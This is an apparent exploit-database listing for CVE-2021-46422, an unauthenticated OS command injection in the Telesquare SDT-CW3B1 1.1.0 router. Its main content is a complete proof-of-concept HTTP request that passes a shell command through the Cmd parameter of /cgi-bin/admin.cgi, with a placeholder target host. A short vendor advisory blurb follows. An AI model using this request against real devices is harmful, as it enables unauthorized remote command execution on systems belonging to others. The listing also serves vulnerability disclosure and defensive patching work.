Headline
SDT-CW3B1 1.1.0 Command Injection
SDT-CW3B1 version 1.1.0 suffers from a command injection vulnerability.
# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection# Date: 2022-05-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: 1.0.0# Vendor home page : http://telesquare.co.kr/# Authentication Required: No# CVE : CVE-2021-46422# Tested on: Windows# HTTP RequestGET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1Host: IP_HEREUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: */*Referer: http:// IP_HERE /admin/system_command.shtmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close
Related news
Telesquare SDT-CW3B1 1.1.0 Command Injection
Telesquare SDT-CW3B1 version 1.1.0 suffers from a command injection vulnerability.
CVE-2021-46422: SDT-CW3B1 – Google Disk
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.